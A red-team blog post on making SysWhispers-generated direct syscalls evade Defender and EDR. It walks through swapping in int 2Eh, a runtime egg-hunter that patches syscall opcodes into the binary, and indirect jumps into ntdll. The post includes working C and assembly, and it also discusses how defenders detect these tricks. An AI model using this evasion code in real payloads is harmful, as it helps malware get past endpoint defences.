SysWhispers is dead, long live SysWhispers!

TL;DR

As already explained in my previous post “The path to code execution in the era of EDR, Next-Gen AVs, and AMSI”, various security products, such as AVs and EDRs, place hooks in user-mode API functions to analyse the execution flow of a specific API in order to detect potentially malicious activities. Naturally, any Red Team Member will always need to find a way to address this “issue”, and execute specific code on a target environment without being flagged.

To anyone not familiar with API hooking, you can check this link to have a very good overview, or this link to get a presentation on the topic.

Main Methods to bypass userland-hooking

There are a few well-known methods to bypass these userland hooks, such as:

Syscalls’ stub reimplementation + Dynamic SSN resolution (CREDITS: Cn33liz)
Hell’s Gate (CREDITS: am0nsec & RtlMateusz)
- Evolution 1: Halo’s Gate (CREDITS: Sektor7)
- Evolution 2: Tartarus’ Gate (CREDITS: Thanasis)
Manual/Overload Mapping (?)
Full/partial Unhooking (?)

*They are all awesome techniques, and I would really like to thank the original “inventors”, I’m just not sure about some of the techniques, so if anyone is aware, please get in touch to let me know.

Although all these techniques are currently adopted and sometimes combined to develop offensive tradecraft, I would like to focus the attention on one of the above techniques: “Syscalls’ stub reimplementation + Dynamic SSN resolution”. This technique, popularized by Cn33liz, was later implemented by Jackson_T in a popular tool for malware development: SysWhispers2.

“SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe). The headers will also include the necessary type definitions.”

Practically, thanks to SysWhispers, offensive developers could easily generate ASM stubs for specific system calls (Syscall Stub Reimplementation) and call the associated system call by retrieving the right SSN at runtime (via SSN EAT ordering).

Useless to say that this tool is probably one of the most useful I had worked with. So useful, that I used it to implement the native system call module of my malware development framework Inceptor.

Offence is the best Defence

I genuinely think that keep improving offensive tooling and adversary emulation/simulation techniques is by far the best way to improve the defensive side as well.

Offensive tooling is constantly affected by this continuous evolution. A huge part of “defensive research” is all about developing or enhancing detection strategies for malware, tools (like C2 frameworks), and libraries (like D/Invoke).

Of course, SysWhispers was also affected by this process. As soon as it was released, this tool was barely noticed by defensive security tools. However, with time, the tool usage has started getting detected by some security solutions, both statically and dynamically. In the following paragraphs, we’ll analyse how, and if we can do something about it.

The mark of the “syscall”

Playing around with my Inceptor, one day I realised Defender was starting detecting some payloads, even if generated with non-public templates. I was puzzled for a bit, even because using ThreatCheck/DefenderCheck I was not able to identify bad bytes.

C:\inceptor> libs\public\ThreatCheck.exe -f artifacts\test.exe
[+] Target file size: 40488 bytes
[+] Analyzing...
[x] File is malicious, but couldn't identify bad bytes

I’ve soon noticed, however, that the same payload was not identified as malicious by Defender when the syscalls modules was not used.

As SysWhispers mainly includes the assembly instructions for the syscalls’ stubs, it was apparent to me that the detection should be based on something related to the stubs. After a while, I realised it was actually the syscall instruction. Thinking about it, it made sense, because there is no valid reason a syscall should be executed directly by an executable. Naturally, when a program needs to execute a System Call, it does that by using an exposed API, so the syscall instruction should be present, by logic, only in ntdll.dll.

To give you a visual representation, by dumping a payload generated by inceptor with -m syscalls, it is indeed possible to notice a bunch of syscall instructions.

Syscall Mark

Bypass the static mark

What now? At the time, I already knew that it was possible to use another instruction to execute a System Call, but let’s proceed step-by-step.

Finding an alternative

By observing the stub of whatever system service call’s stub in ntdll.dll, it’s possible to notice a specific pattern:

Syscall Stub Pattern

If we rebuild the ASM code for this System Call, we could write something similar to this:

__syscall_stub:
  mov r10, rcx
  mov eax, <SSN>
  test byte ptr [SharedUserData+0x308], 1
  jne __syscall_not_enabled
  syscall
  ret
  
__syscall_not_enabled:
  int 2eh
  ret

There’s not much to explain, but let’s do it to ensure we are all on the same page.

mov r10, rcx
mov eax, <SSN>

The first two instructions are there just to ensure that rcx is saved in r10 and the correct System Service Number is stored in eax. The value r10 is the address of the first instruction to be executed back in userland, while the value in eax is used to invoke the right system call.

test byte ptr [SharedUserData+0x308], 1
jne __syscall_instruction_not_supported

Now the interesting part, the function checks if SharedUserData[0x308] is set to 1. SharedUserData is a symbol referring to the Kernel mode structure KUSER_SHARED_DATA.

The KUSER_SHARED_DATA structure defines a fixed (or pre-defined) memory space used to share information with user-mode software. This, of course, was done for making certain global system information ready to be consumed by user-land code without the overhead to switch every time between user and kernel-mode execution.

The value at index 0x308 represents the syscall instruction, which is supported in all Windows versions from 1511. As you might imagine, in all versions of Windows before 1511, the standard way to execute a syscall was by calling the interrupt int 2Eh.

Offset	Definition	Versions
0x308	ULONG SystemCall;	1511 and higher

Geoff Chappell - KUSER_SHARED_DATA

If you’re asking yourself why this int 2Eh is still there, even if Windows is now far above version 1511, it’s because this instruction is still used. Indeed, when HVCI (Hypervisor-protected Code Integrity) is enabled, SharedUserData[0x308] is set to 0, and the int 2Eh is used instead of the syscall instruction. This is mostly done for performance reasons, due to how the Ring3 to Ring0 switch is operated using one or the other instruction.

However, what this tells us? Well, in a nutshell, that we can easily change every syscall occurrence with an int 2Eh, and the code should run exactly the same.

As I’ve suggested at the beginning, I already knew about the int 2Eh instruction, but I thought it was interesting to show that this instruction could be recovered easily regardless.

Is this really enough?

Honestly, I supposed Defender implemented a signature also for this instruction. It would make sense, because I actually don’t know a legitimate use of this instruction in a user-mode application. But Defender didn’t implement that signature (not at the time, at least). So just this little modification was enough to bypass Defender again:

Syscall replaced by int 2Eh

The journey to bypass the newly introduced signature was not long. Honestly, I was a bit disappointed at this point, because I was expecting something more from Defender this time.

Before I finished this article, I found the same story wrote by a fellow researcher, Capt. Meelo. Here his blog post “When You sysWhisper Loud Enough for AV to Hear You”.

A new journey begins

Even if this journey was quite simple, this was just the start for a bigger journey, usable in case Defender could be made smart enough to hunt also for int 2Eh (opcodes: cd 2e).

Note: The techniques presented in the rest of the blog post are integrated into inceptor (sponsored).

A better alternative to int 2Eh - Egg Hunting

As already noticed by Capt. Meelo, changing the syscall instruction with int 2Eh can lead to other issues. On one hand it’s very easy to use, but on the other it’s easy to signature, easy to hunt, and it also might not work as expected.

So what could be a better path to follow? Well, there are multiple choices, for sure. One technique might be placing specific placeholders instead of our syscall instructions, and change them at runtime. We can implement this in the form of an egg-hunter. To understand how this might work, it is necessary to understand first what an egg-hunter is, and how we can adapt it to our use case.

Generally, an egg-hunter is the first stage of a multistage payload. It is usually nothing more than a piece of code that locates specific patterns in memory by scanning it sequentially. The pattern is just an arbitrary sequence of bytes, and it’s historically called “egg”. To avoid errors, the egg is usually inserted “doubled”. The most iconic egg ever used is probably “w00t”, which gives the pattern “w00tw00t” to search.

In assembly, when we want to insert a series of bytes in memory, we can use the “DB” trick. DB is an assembly instruction used to “define a byte”. So, if we want to insert the sequence “w00t” in memory, we can do it like:

DB 77h ; 'w'
DB 0h  ; '0'
DB 0h  ; '0'
DB 74h ; 't'

Using this trick, we can place a sequence of known-bytes (egg) as a placeholder for the syscall instruction, and replace it at runtime. Integrated into SysWhispers, that will give the pattern below. For simplicity, only one NtApi (NtAllocateVirtualMemory) is shown.

NtAllocateVirtualMemory PROC
  mov [rsp +8], rcx          ; Save registers.
  mov [rsp+16], rdx
  mov [rsp+24], r8
  mov [rsp+32], r9
  sub rsp, 28h
  mov ecx, 003970B07h        ; Load function hash into ECX.
  call SW2_GetSyscallNumber  ; Resolve function hash into syscall number.
  add rsp, 28h
  mov rcx, [rsp +8]          ; Restore registers.
  mov rdx, [rsp+16]
  mov r8, [rsp+24]
  mov r9, [rsp+32]
  mov r10, rcx
  DB 77h                     ; "w"
  DB 0h                      ; "0"
  DB 0h                      ; "0"
  DB 74h                     ; "t"
  DB 77h                     ; "w"
  DB 0h                      ; "0"
  DB 0h                      ; "0"
  DB 74h                     ; "t"
  ret
NtAllocateVirtualMemory ENDP

Using the stub above in a real program would naturally result in a crash and exit, as the function does practically nothing than crafting the stack for a system call and return.

SysWhispering too low

In order to be usable, we need to modify the “w00tw00t” in memory with the necessary opcodes, in this case 0f 05 c3 90 90 90 90 90 (or similar), which translates to syscall; ret; nop; nop; nop; nop; nop;.

This can be done in a variety of ways. A sample code to achieve this is provided below:

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <psapi.h>

#define DEBUG 0

HMODULE GetMainModule(HANDLE);
BOOL GetMainModuleInformation(PULONG64, PULONG64);
void FindAndReplace(unsigned char[], unsigned char[]);

HMODULE GetMainModule(HANDLE hProcess)
{
    HMODULE mainModule = NULL;
    HMODULE* lphModule;
    LPBYTE lphModuleBytes;
    DWORD lpcbNeeded;

    // First call needed to know the space (bytes) required to store the modules' handles
    BOOL success = EnumProcessModules(hProcess, NULL, 0, &lpcbNeeded);

    // We already know that lpcbNeeded is always > 0
    if (!success || lpcbNeeded == 0)
    {
        printf("[-] Error enumerating process modules\n");
        // At this point, we already know we won't be able to dyncamically
        // place the syscall instruction, so we can exit
        exit(1);
    }
    // Once we got the number of bytes required to store all the handles for
    // the process' modules, we can allocate space for them
    lphModuleBytes = (LPBYTE)LocalAlloc(LPTR, lpcbNeeded);

    if (lphModuleBytes == NULL)
    {
        printf("[-] Error allocating memory to store process modules handles\n");
        exit(1);
    }
    unsigned int moduleCount;

    moduleCount = lpcbNeeded / sizeof(HMODULE);
    lphModule = (HMODULE*)lphModuleBytes;

    success = EnumProcessModules(hProcess, lphModule, lpcbNeeded, &lpcbNeeded);

    if (!success)
    {
        printf("[-] Error enumerating process modules\n");
        exit(1);
    }

    // Finally storing the main module
    mainModule = lphModule[0];

    // Avoid memory leak
    LocalFree(lphModuleBytes);

    // Return main module
    return mainModule;
}

BOOL GetMainModuleInformation(PULONG64 startAddress, PULONG64 length)
{
    HANDLE hProcess = GetCurrentProcess();
    HMODULE hModule = GetMainModule(hProcess);
    MODULEINFO mi;

    GetModuleInformation(hProcess, hModule, &mi, sizeof(mi));

    printf("Base Address: 0x%llu\n", (ULONG64)mi.lpBaseOfDll);
    printf("Image Size:   %u\n", (ULONG)mi.SizeOfImage);
    printf("Entry Point:  0x%llu\n", (ULONG64)mi.EntryPoint);
    printf("\n");

    *startAddress = (ULONG64)mi.lpBaseOfDll;
    *length = (ULONG64)mi.SizeOfImage;

    DWORD oldProtect;
    VirtualProtect(mi.lpBaseOfDll, mi.SizeOfImage, PAGE_EXECUTE_READWRITE, &oldProtect);

    return 0;
}

void FindAndReplace(unsigned char egg[], unsigned char replace[])
{

    ULONG64 startAddress = 0;
    ULONG64 size = 0;

    GetMainModuleInformation(&startAddress, &size);

    if (size <= 0) {
        printf("[-] Error detecting main module size");
        exit(1);
    }

    ULONG64 currentOffset = 0;

    unsigned char* current = (unsigned char*)malloc(8*sizeof(unsigned char*));
    size_t nBytesRead;

    printf("Starting search from: 0x%llu\n", (ULONG64)startAddress + currentOffset);

    while (currentOffset < size - 8)
    {
        currentOffset++;
        LPVOID currentAddress = (LPVOID)(startAddress + currentOffset);
        if(DEBUG > 0){
            printf("Searching at 0x%llu\n", (ULONG64)currentAddress);
        }
        if (!ReadProcessMemory((HANDLE)((int)-1), currentAddress, current, 8, &nBytesRead)) {
            printf("[-] Error reading from memory\n");
            exit(1);
        }
        if (nBytesRead != 8) {
            printf("[-] Error reading from memory\n");
            continue;
        }

        if(DEBUG > 0){
            for (int i = 0; i < nBytesRead; i++){
                printf("%02x ", current[i]);
            }
            printf("\n");
        }

        if (memcmp(egg, current, 8) == 0)
        {
            printf("Found at %llu\n", (ULONG64)currentAddress);
            WriteProcessMemory((HANDLE)((int)-1), currentAddress, replace, 8, &nBytesRead);
        }

    }
    printf("Ended search at:   0x%llu\n", (ULONG64)startAddress + currentOffset);
    free(current);
}

Within an inceptor template, then, we can simply do something like this:

int main(int argc, char** argv) {

    unsigned char egg[] = { 0x77, 0x00, 0x00, 0x74, 0x77, 0x00, 0x00, 0x74 }; // w00tw00t
    unsigned char replace[] = { 0x0f, 0x05, 0x90, 0x90, 0xC3, 0x90, 0xCC, 0xCC }; // syscall; nop; nop; ret; nop; int3; int3

    //####SELF_TAMPERING####
    (egg, replace);

    Inject();
    return 0;
}

The //####SELF_TAMPERING#### placeholder will be replaced by the randomly-named function FindAndReplace. We can compile it using the following command line:

python inceptor.py native tests\note.raw -o artifacts\note.exe -m syscalls -m self_tampering

If this is compiled with Inceptor, we can notice how the eggs are detected by our egg-hunter and replaced with the correct instructions, successfully executing the code.

SysWhispering the egg

Here’s the detail of the spotted instructions:

Egg-hunter detail

Detected again! The RIP curse

This technique is not easy to detect as replacing syscall with int 2Eh but, of course, it can still be detected by a careful hunter. How?

Thanks to my friend and researcher Olaf Hartong, I’ve realised that defenders are not just looking for System Calls to happen, but they also focus on WHERE a specific syscall instruction was executed. In this context, the main issue with using System Call stubs re-implementation, is that a System Call originates from a module in memory which is not ntdll.dll.

Indeed, if the call was legitimately called, the return address (from the kernel) should be in ntdll, while if it was crafted within the binary itself, the kernel should return to an address within the main image of the program which executes it.

Let’s make it clear with a scheme. When a System Call is called through an API, the flow appears like in the following scheme:

Normal API Flow

As observable, when the execution returns from kernel to user mode code, the RIP (the instruction pointer) is in ntdll. As we’ve seen, after the syscall instruction, usually there is a ret, which returns the execution back to the caller.

However, when a function is crafted as in SysWhispers, the syscall instruction is executed directly within the main module of the program, and the flow appears like the following:

Crafted Syscall Flow

As such, detecting maliciously crafted system calls could be easily done using a RIP sanity check. The question now is, can we intercept the execution whenever the kernel switch back to user mode? We can, by using a framework and some tricks shared by Alex Ionescu at REcon in 2015, wrapped, and superbly presented in a talk titled Hooking Nirvana.

Nirvana is a lightweight, dynamic translation framework that can be used to monitor and control the (user mode) execution of a running process without needing to recompile or rebuild any code in that process. This is sometimes also referred to as program shepherding, sandboxing, emulation, or virtualization. Dynamic translation is a powerful complement to existing static analysis and instrumentation techniques. – Microsoft

Leveraging Nirvana, a security tool, or a hunter, can hook and monitor all kernel -> user mode callbacks.

More specifically, it is possible to leverage the KPROCESS!InstrumentationCallback field to execute a callback every time there is a kernel to user mode switch. The main idea is to save the RIP, and analyse it to see if, when the execution returns to user mode, it is within the ntdll address space.

While I was trying to implement it, I found this project already implemented here. The project was released altogether with a nice article. It’s an incredibly good read.

Once compiled, we can add it to our project by simply loading the DLL using LoadLibrary:

int main(int argc, char** argv) {
    
    LoadLibrary("C:\\syscall-detect.dll");
    
    unsigned char egg[] = { 0x77, 0x00, 0x00, 0x74, 0x77, 0x00, 0x00, 0x74 }; // w00tw00t
    unsigned char replace[] = { 0x0f, 0x05, 0x90, 0x90, 0xC3, 0x90, 0xCC, 0xCC }; // syscall; nop; nop; ret; nop; int3; int3

    //####SELF_TAMPERING####
    (egg, replace);

    Inject();
    return 0;
}

And… yes, it can spot us pretty easily:

Detected by syscall-detect

Bypassing the RIP check

We can again bypass this check with a nice technique, both simple and flexible, which consists in performing an indirect jump from our code to a syscall instruction inside ntdll.dll. I usually refer to this technique as “Jumper”.

However, if we want to implement something like that, we would need to dynamically resolve the address of the correct syscall instruction, for each System Call we want to use. After a skim read of the SysWhispers code, it was apparent I could easily implement the missing functionality.

Indeed, SysWhispers already maintained in memory a structure to associate System Service Numbers (SSN) and RVAs:

typedef struct _SW2_SYSCALL_ENTRY
{
    DWORD Hash;
    DWORD Address;
    // ---> ADDING A FIELD 
    // ULONG64 SyscallOffset;
} SW2_SYSCALL_ENTRY, *PSW2_SYSCALL_ENTRY;

typedef struct _SW2_SYSCALL_LIST
{
    DWORD Count;
    SW2_SYSCALL_ENTRY Entries[SW2_MAX_ENTRIES];
} SW2_SYSCALL_LIST, *PSW2_SYSCALL_LIST;

As such, we can easily add a ULONG64 field to store the syscall instruction absolute address. With that set, when the _SW2_SYSCALL_LIST is populated, we need a way to calculate the address of the syscall instruction. We can borrow the same logic of the Egg-Hunter implemented earlier, as the concept is the same. In this case though, we have already the ntdll.dll base address, and SysWhispers also calculates the function RVA from the DLL EAT (Export Address Table). As such, the only things to calculate is the relative position of the syscall instruction and do some maths.

A pseudo-code implementation could be:

function findOffset(HANDLE current_process, int64 start_address, int64 dllSize) -> int64:
  int64 offset = 0
  bytes signature = "\x0f\x05\x03"
  bytes currentbytes = ""
  while currentbytes != signature:
    offset++
    if offset + 3 > dllSize:
      return INFINITE
    ReadProcessMemory(current_process, start_address + offset, &currentbytes, 3, nullptr)
  return start_address + offset  

I’m not sharing the full implementation, but at this point you have enough code to crack your own ;)

Once we have the address of the syscall instruction associated with the Nt/Zw function we need to call, we can just jump to it, using JMP <Syscall Address>.

In this response by S4ntiagoP, I was notified that nanodump utilises this technique to create the stubs to dump LSASS. If you’re interested in seeing an actual implementation, check it here.

“Freshy” System Calls

Before continuing, I would like to notice that a similar technique was implemented by Elephantse4l in the FreshyCalls.

However, this technique uses static offsets from the start of the system call stub to detect the syscall instruction, as you can see in the code below:

// Tries to locate the syscall instruction inside a stub using some known patterns. Returns
// the address of the instruction.

[[nodiscard]] static inline uintptr_t FindSyscallInstruction(uintptr_t stub_addr) noexcept {
  uintptr_t instruction_addr;

  // Since Windows 10 TH2
  if (*(reinterpret_cast<unsigned char *>(stub_addr + 0x12)) == 0x0F &&
      *(reinterpret_cast<unsigned char *>(stub_addr + 0x13)) == 0x05) {
    instruction_addr = stub_addr + 0x12;
  }

    // From Windows XP to Windows 10 TH2
  else if (*(reinterpret_cast<unsigned char *>(stub_addr + 0x8)) == 0x0F &&
      *(reinterpret_cast<unsigned char *>(stub_addr + 0x9)) == 0x05) {
    instruction_addr = stub_addr + 0x8;
  } else {
    instruction_addr = 0;
  }

  return instruction_addr;
};

This means that, if any userland hooks are placed between the start of the signature and the syscall instruction, FreshyCalls would fail to execute them.

So what if there are any hooks installed?

As opposed to FreshyCalls implementation, our newly implemented jumper is less susceptible to hooks, as it dynamically searches for the syscall instruction, which must be there, in ntdll.dll. It indeed doesn’t use static offsets from the start of the syscall signature, which could be broken by inline hooks installed within the dll.

Demo

And below we can see how it is possible to bypass the RIP check using the indirect jump:

Bypass Syscall Detect

Additional considerations

In his blog, Elephantse4l assumed that, by jumping to syscall instruction inside ntdll, we somehow “leaked” the syscall we used.

In a response on Twitter, Elephantse4l explained to me that what this means is that the return address (back from kernel) can be correlated using ETW to identify the system call we used. This would eventually open up for interesting scenarios where we use a direct JMP to a syscall in ntdll, but using the address of a syscall instruction from a different API than the one we are actually using.

To make an example, if we are using NtAllocateVirtualMemory, we can perform an indirect jump to the address of the syscall instruction inside NtTestAlert, and so on.

However, regardless how the system call is actually implemented (within the main program or via a jump to ntdll), it can still be detected by leveraging kernel tracing. Kernel tracing detects the system call by using the SSN value more than the return address, and as such, it’s pretty difficult to trick.

A trivial example is offered by the following D script for DTrace:

syscall::NtAllocateVirtualMemory:entry 
/execname == $1 / 
{  
  MEM_COMMIT = 0x00001000;
  MEM_PHYSICAL = 0x00400000;
  MEM_RESERVE = 0x00002000;
  
  PAGE_EXECUTE_READWRITE = 0x40;

  /*
  arg3 is the RegionSize, which is a pointer to the variable that will contain the actual size of the allocated buffer
  of course, we are interested only in pointers in user land 		
  */
  if (arg3 > 0) 
  {	
    if ( (arg4 & MEM_COMMIT) && (arg4 & MEM_RESERVE) )
      if ( (arg5 & PAGE_EXECUTE_READWRITE) )
        printf(" Bytes reserved & commited %d ",  * (nt`PSIZE_T) copyin(arg3, sizeof (nt`PSIZE_T)));
  } 	
}

If executed via dtrace, as:

dtrace -s NtAllocateVirtualMemory.d test.exe

DTrace can easily see the syscall generated via an indirect JMP to ntdll using our modified SysWhispers.

SysWhispers Jumper Detected

But can also easily see the syscall generated in the main Program module using the normal SysWhispers.

SysWhispers Normal Detected

Stupid, but maybe effective

A stupidly simple way for an EDR to detect if a program is doing anything “suspicious” would be to count the number of system calls executed by it, and validate that number against the number of system calls executed by that program and successfully analysed by the EDR itself. If the numbers mismatch, the program is very likely to be hiding its behaviour.

Conclusion

Although more appealing techniques for user-land hooking bypass are becoming more prominent, like Hell’s Gate, and even more its evolutions (Halo’s and Tartarus’), I think the technique implemented in SysWhispers offers some advantages which are difficult to not considerate for offensive development, the only requirement is a bit of creativity.

Back to Red Teaming

Back to Home

CyberSecurity Blog

Various Posts around Cyber Sec